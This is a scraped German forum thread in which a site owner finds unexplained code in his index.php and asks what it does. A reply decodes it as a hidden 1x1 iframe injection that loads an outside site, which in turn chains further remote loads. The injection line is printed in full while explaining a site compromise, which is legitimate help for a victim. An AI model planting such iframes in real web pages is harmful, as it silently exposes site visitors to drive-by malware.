![]() | |
![]() |
| | Thread Tools | Display Modes |
| |||
| |||
|
| |||
| |||
|
|
Hallo, da meine Seite heute einen Fehler lieferte, habe ich mal nachgesehen und den den unten aufgelisteten Code in der index.php gefunden. Ich habe ihn nicht eingefügt aber mich interessiert: Was tut das? |
| |||
| |||
|
|
da meine Seite heute einen Fehler lieferte, habe ich mal nachgesehen und den den unten aufgelisteten Code in der index.php gefunden. Ich habe ihn nicht eingefügt aber mich interessiert: Was tut das? |
| |||
| |||
|
|
Hallo, da meine Seite heute einen Fehler lieferte, habe ich mal nachgesehen und den den unten aufgelisteten Code in der index.php gefunden. Ich habe ihn nicht eingefügt aber mich interessiert: Was tut das? |
| |||
| |||
|
|
Uwe Ziegenhagen schrieb: Hallo, da meine Seite heute einen Fehler lieferte, habe ich mal nachgesehen und den den unten aufgelisteten Code in der index.php gefunden. Ich habe ihn nicht eingefügt aber mich interessiert: Was tut das? Es führt folgenden Befehl aus: document.write('<iframe src="http://all-xxx-vogue.com/cgi-bin/in.cgi?p=admin" width="1" height="1" style="border: 0px"></iframe>') Von dort wird wieder so etwas geladen und ausgeführt und von dort wieder und so weiter. Irgendwann will mein VLC ein RTSP-Filmchen abspielen, was ihm vom Webserver aber nicht erlaubt wird (403-Fehler). viele grüße ralph |
![]() |
| Thread Tools | |
| Display Modes | |
| |